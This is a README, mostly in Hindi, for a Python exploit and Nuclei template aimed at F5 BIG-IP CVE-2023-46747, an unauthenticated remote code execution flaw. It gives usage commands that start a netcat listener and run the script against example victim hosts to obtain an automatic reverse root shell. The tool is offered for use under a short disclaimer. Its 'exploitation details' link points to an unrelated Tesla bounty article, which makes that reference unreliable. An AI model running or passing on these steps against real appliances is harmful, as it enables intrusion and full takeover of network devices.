
#F5-BIG-IP-CVE-2023-46747-Exploit – अप्रमाणित RCE Raguraman द्वारा Python exploit और Nuclei टेम्पलेट ✓ स्वचालित TCP रिवर्स शेल (LHOST/LPORT) ✓ प्रभावित BIG-IP 13.x–17.x पर परीक्षण किया गया ⚠️ केवल अधिकृत पेन-टेस्टिंग के लिए
Python3 और Nuclei संस्करण – रागुरामन द्वारा
गंभीर अप्रमाणित RCE (CVSS 9.8) AJP + HTTP अनुरोध तस्करी के माध्यम से
सभी अनपैच किए गए BIG-IP 13.x → 17.x (नवीनतम 17.1.0.3 सहित) पर काम करता है
पैच: https://my.f5.com/manage/s/article/K000137353 (नवंबर 2023)
वास्तविक दुनिया का शोषण विवरण: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → स्टैंडअलोन Python3 (अनुशंसित)CVE-2023-46747-revshell.yaml → Nuclei टेम्पलेट (वैकल्पिक)# 1. Start your listener
nc -lvnp 4444
# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → Instant root shell!
Usage – Nuclei template (alternative) Bash # 1. Edit LHOST and LPORT inside the YAML file
nc -lvnp 4444
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, जैसे:
अनुमोदित पैठ परीक्षण कार्य
लिखित अनुमति के साथ रेड टीम संचालन
नियंत्रित प्रयोगशाला वातावरण में अनुसंधान
इस शोषण का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। अनधिकृत शोषण अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है।
इस उपकरण का उपयोग करके, आप लागू कानूनों के अनुपालन की सभी जिम्मेदारी स्वीकार करते हैं। लेखक किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।